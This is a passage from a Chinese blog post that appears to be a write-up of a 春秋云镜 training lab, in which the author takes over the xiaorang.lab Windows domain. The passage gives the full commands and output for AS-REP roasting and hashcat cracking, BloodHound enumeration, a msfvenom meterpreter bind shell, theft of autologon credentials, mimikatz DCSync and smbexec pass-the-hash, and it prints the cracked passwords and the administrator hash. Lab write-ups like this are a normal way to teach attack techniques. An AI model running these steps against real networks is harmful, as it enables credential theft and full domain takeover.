<pre><code class="bash">proxychains python3 GetNPUsers.py  -dc-ip 172.22.6.12 -usersfile GetNPUser.txt  -format hashcat xiaorang.lab/ &gt; result/NPU.txt
</code></pre>
<p>得到用户<code>wenshao</code>和<code>zhangxin</code>的hash</p>
<pre><code>$krb5asrep$23$zhangxin@XIAORANG.LAB:36c9d9a10f92e0b48643660c1e3bc6a9$3ab9996ef66ea9ae9d4d2daef65ad539ff59df7277af7fcaf9e1d5b650ccd1c75a6d0007863e54ed9525c140e1337529cf99c81332155643cdd4f8c5c78c0c0252d460fd382f7adc5cdab648857076552d6f362b4b2b5b25f7df2955efdcc5870f8199255bd1f227652a31c5613ff2408183a497f9a11117b77929057d3f06033b7ab20a1d42033c083cde35eff0c39641046f9f927402b643416c3e2aca71edc7d016256b1385d54176a8dba1ac9bb4f8816ea370db8a3d0319762c435d0c4cbac30ca5dc1a6a0f0731054a8ab7c808c94613f931aba553f99aef8a044d50aacd621d79fbdb2ee8800ddff4

$krb5asrep$23$wenshao@XIAORANG.LAB:2b89ef7bf03e832196f6c91d0ea3e27b$d6992ffaa3fb9bc3427d0659be92ee407cad1c231b222235d20cadccd55c2d6cceabf4032deaa3995d42df7771cb7436fe0573756cec56706ca4c889ff054027100361a7f3e3c4229bc1bdc01e111676919a7d1a2170bce258de1c5aee318c3a9c1404312a5b0b21c1e9f3ee893161b0b9e6341c9390713b836b61edda5dd2ee7f4aa4643d768430eec63d4ab389cb5adf0a8628b58b7ec0f69729b43d0bb6f978d956710d4f6cb006888473fec5149f1ec39b33bfbfae0f878fc2d2eed4e9fd810225f1e2d737b885464715210ec22d077fd53fbd1baf770158ddb65a147d90a35b073595cf2c37b9a4d4c8
</code></pre>
<p>然后用hashcat进行爆破</p>
<pre><code class="bash">hashcat  -a 0 -m 18200  1.txt  rockyou.txt  -o 2.txt 
</code></pre>
<p>得到明文密码</p>
<pre><code>wenshao@XIAORANG.LAB:hellokitty
zhangxin@XIAORANG.LAB:strawberry
</code></pre>
<p>用这个账户登录域内主机<code>172.22.6.25</code></p>
<h2 id="用Bloodhound进行域信息收集"><a href="#用Bloodhound进行域信息收集" class="headerlink" title="用Bloodhound进行域信息收集"></a>用Bloodhound进行域信息收集</h2><p>然后使用Sharphound来收集域信息</p>
<pre><code class="bash">Sharphound.exe --CollectionMethods ALL --Domain XIAORANG.LAB --ExcludeDCs
</code></pre>
<p>然后使用<a target="_blank" rel="noopener" href="https://github.com/BloodHoundAD/BloodHound">Bloodhound</a>来分析域环境</p>
<pre><code class="bash">sudo neo4j console 
</code></pre>
<pre><code class="bash">./BloodHound --no-sandbox
</code></pre>
<p>然后将压缩包导入，进行分析</p>
<p>点击分析，找到<code>Find Shortest Paths to Domain Admins</code>，就是最短到域管理员的路径</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304131932752.png" alt="image-20230413193240642"></p>
<p>当前机器为<code>WIN2019.XIAORANG.LAB</code>，所以下一个目标就是<code>YUXUAN@XIAORANG.LAB</code></p>
<h2 id="通过自动登录注册表来抓取明文密码"><a href="#通过自动登录注册表来抓取明文密码" class="headerlink" title="通过自动登录注册表来抓取明文密码"></a>通过自动登录注册表来抓取明文密码</h2><p>HasSession</p>
<blockquote>
<p>当用户向计算机进行身份验证时，他们通常会将凭据暴露在系统上，这些凭据可以通过 LSASS 注入、令牌操纵或盗窃或注入用户进程来检索。</p>
<p>任何作为系统管理员的用户都能够从内存中检索凭证材料（如果它仍然存在）</p>
</blockquote>
<p>这里的用户特权不够，所以不能进行令牌窃取</p>
<p>这里也无法使用mimikatz来获取hash，因为没有管理员权限</p>
<p>这里是使用msf来抓取自动登录密码，可能这个YUNXUAN会设置自动登录，所以可以进行抓取密码【我也不知道原理是啥】</p>
<p>先生成一个正向shell，上传上去</p>
<pre><code class="bash">msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o bind_shell.exe
</code></pre>
<p>上线meterpreter后使用<code>windows/gather/credentials/windows_autologin</code>来抓取凭据</p>
<blockquote>
<p>当用户开启Windows自动登录功能时，系统会将登录凭证信息存储在注册表中，而这些凭证信息包括用户的用户名和密码。攻击者可以通过访问系统注册表来获取这些凭证信息，从而实现获取用户账户的访问权限。</p>
<p>具体来说，攻击者需要获取目标系统上的管理员权限，然后使用注册表编辑器（Registry Editor）访问以下路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon。在这个路径下，攻击者可以找到如下键值：</p>
<ol>
<li>DefaultUserName：这个键值保存了自动登录的用户名。</li>
<li>DefaultPassword：这个键值保存了自动登录的密码（以明文形式存储）。</li>
</ol>
<p>利用Metasploit框架中提供的特殊权限或技术手段来绕过这些限制，并在没有管理员权限的情况下获取这些预设凭据【但是我没有搜到具体的实现过程】</p>
</blockquote>
<pre><code class="bash">meterpreter &gt; run windows/gather/credentials/windows_autologin
</code></pre>
<p>得到明文密码</p>
<pre><code class="bash">[+] AutoAdminLogon=1, DefaultDomain=xiaorang.lab, DefaultUser=yuxuan, DefaultPassword=Yuxuan7QbrgZ3L
</code></pre>
<p>然后登录这个用户，还是在<code>172.22.6.25</code>主机上</p>
<p>查看这个用户的信息</p>
<pre><code class="bash">net user yuxuan /domain
</code></pre>
<p>发现在域管理员组里</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304132146298.png" alt="image-20230413214613231"></p>
<h2 id="DCSync抓取Hash"><a href="#DCSync抓取Hash" class="headerlink" title="DCSync抓取Hash"></a>DCSync抓取Hash</h2><p>可以使用DCSync攻击来获取hash</p>
<p>使用mimikatz获取hash</p>
<pre><code class="bash">lsadump::dcsync /domain:xiaorang.lab /user:administrator 
</code></pre>
<p>获取了administrator的HTLM hash:<code>04d93ffd6f5f6e4490e0de23f240a5e9</code></p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304132222871.png" alt="image-20230413222255809"></p>
<h2 id="Hash传递获得管理员权限"><a href="#Hash传递获得管理员权限" class="headerlink" title="Hash传递获得管理员权限"></a>Hash传递获得管理员权限</h2><p>因为没有本地的管理员权限，所以使用impacket进行pth来横向移动到域控</p>
<pre><code class="bash">proxychains python smbexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.12
# python smbexec.py -hashes LM Hash:NLTM Hash domain/username@ip
#-hashs，知道用户完整的哈希值，如果LM hash被废弃，就指定为0或空
</code></pre>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304132228583.png" alt="image-20230413222828538"></p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304132237309.png" alt="image-20230413223711273"></p>
<h3 id="flag3和flag4"><a href="#flag3和flag4" class="headerlink" title="flag3和flag4"></a>flag3和flag4</h3><p>获得flag04: <code>flag&#123;1564cc85-6c3c-47ba-ab0d-1cca0d82b60b&#125;</code></p>
<p>擦，用同样的方式获得WIN2019的administrator用户权限</p>
<pre><code class="bash">proxychains python smbexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25
</code></pre>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202304132236637.png" alt="image-20230413223649596"></p>
<p>获得flag03: <code>flag&#123;47a4480c-9cef-47c4-b11d-961aaf1c4d6c&#125;</code></p>

    </div>

    <div class="post-meta">
        <i>
        
            <span>2023-07-03</span>
            
                <span>该篇文章被 v2ish1yan</span>
            
            
                <span>打上标签:
                    
                    
                        <a href='/tags/Neo4j/'>
                            Neo4j
                        </a>
                    
                        <a href='/tags/Kerberos/'>
                            Kerberos
                        </a>
                    
                        <a href='/tags/Privilege-Elevation/'>
                            Privilege Elevation
                        </a>
                    
                        <a href='/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/'>
                            域渗透
                        </a>
                    
                </span>
             
             
                <span>归为分类:
                    
                    
                        <a href='/categories/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C/'>
                            春秋云镜
                        </a>
                    
                </span>
            
        
        </i>
    </div>
    
        
    <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
         
    </div>
    
        

    <div id="waline"></div>
    <script type="module"  >
        import { init } from 'https://npm.elemecdn.com/hexo-theme-a4@latest/source/js/waline.mjs'; 
        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://a4-talk.vercel.app',
                lang: 'zh-CN',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
                search: false, // 禁止表情包搜索
                reaction: false, // 对文章打分
                pageview: false, // 浏览量统计
                comment: false, // 评论数统计

                locale: {
                    placeholder: '欢迎评论', 
                    sofa: ''
                },
            });
            
        }
        window.addEventListener('DOMContentLoaded', loadWaline);
    </script>



    
    
    
    </div>


     
</div>



                                      
                    
                    
                    <div class="footer">
    
        <span> 
            © 1949-2024 China 

            
                

            
        </span>
    
</div>
<!--这是指一条线往下的内容-->
<div class="footer-last">
    
            <span>🌊面朝大海，春暖花开🌸</span>
            
                <span class="footer-last-span-right"><i>本站由<a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/index.html">Hexo</a>驱动｜使用<a target="_blank" rel="noopener" href="https://github.com/HiNinoJay/hexo-theme-A4">Hexo-theme-A4</a>主题</i></span>
            
    
</div>


   
    
<script src="/js/highlight.min.js"></script>

    
<script src="/js/highlightjs-line-numbers.js"></script>


    
<script src="/js/randomHeaderContent.js"></script>

    <!--回到顶部按钮-->
    
        
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>

        
<script src="/js/returnToTop.js"></script>

    

    <!--目录-->
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript" ></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js" type="text/javascript" ></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.tocify/1.9.0/javascripts/jquery.tocify.min.js" type="text/javascript" ></script>
        
<script src="/js/toc.js"></script>

    



<script>
    hljs.initHighlightingOnLoad();
    hljs.initLineNumbersOnLoad();
</script>



                </div>
            
            
                <!-- 回到顶部的按钮-->  
                <div class="progress-wrap shadow-drop-2-bottom">
                    <svg class="progress-circle svg-content" width="100%" height="100%" viewBox="-1 -1 102 102">
                        <path d="M50,1 a49,49 0 0,1 0,98 a49,49 0 0,1 0,-98"/>
                    </svg>
                </div>
            
    </body>


    <!--暗黑模式-->
    <script src="/js/darkmode-js.min.js"></script>
    <script>
        function addDarkmodeWidget() {
        const options = {
            bottom: '53px', // default: '32px'
            right: 'unset', // default: '32px'
            left: '42px', // default: 'unset'
            time: '0.3s', // default: '0.3s'
            mixColor: '#fff', // default: '#fff'
            backgroundColor: ' #e4e4e4  ',  // default: '#fff'
            buttonColorDark: '#100f2c',  // default: '#100f2c'
            buttonColorLight: '#fff', // default: '#fff'
            saveInCookies: true, // default: true,
            label: '🌓', // default: ''
            autoMatchOsTheme: true // default: true
        }
    
        const darkmode = new Darkmode(options);
        darkmode.showWidget();
        
        }
        window.addEventListener('load', addDarkmodeWidget);
    </script>
  
</html>